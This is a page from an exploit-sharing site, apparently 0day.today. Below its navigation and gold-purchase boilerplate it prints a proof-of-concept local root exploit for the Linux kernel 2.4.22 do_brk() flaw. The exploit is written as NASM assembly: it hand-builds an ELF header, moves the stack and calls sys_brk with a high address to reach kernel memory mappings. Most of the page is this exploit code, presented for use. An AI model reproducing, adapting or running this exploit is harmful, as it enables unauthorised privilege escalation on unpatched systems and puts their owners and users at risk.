0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)
[=======================================================
Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)
=======================================================
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
; ** Make sure the stack is not above us
mov eax, 163 ; mremap
mov ebx, esp
and ebx, ~(0x1000 - 1) ; align to page size
mov ecx, 0x1000 ; we suppose stack is one page only
mov edx, 0x9000 ; be sure it can't get mapped after
; us
mov esi,1 ; MREMAP_MAYMOVE
int 0x80
and esp, (0x1000 - 1) ; offset in page
add esp, eax ; stack ptr to new location
; nb: we don't fix
; pointers so environ/cmdline
; are not available
mov eax,152 ; mlockall (for tests as root)
mov ebx,2 ; MCL_FUTURE
int 0x80
; get VMAs for the kernel memory
mov eax,45 ; brk
mov ebx,0xC0500000
int 0x80
mov ecx, 4
loop0:
mov eax, 2 ; fork
int 0x80
loop loop0
_idle:
mov eax,162 ; nanosleep
mov ebx,timespec
int 0x80
jmp _idle
timespec dd 10,0
filesize equ $ - $$
;
# 0day.today [2024-11-15] #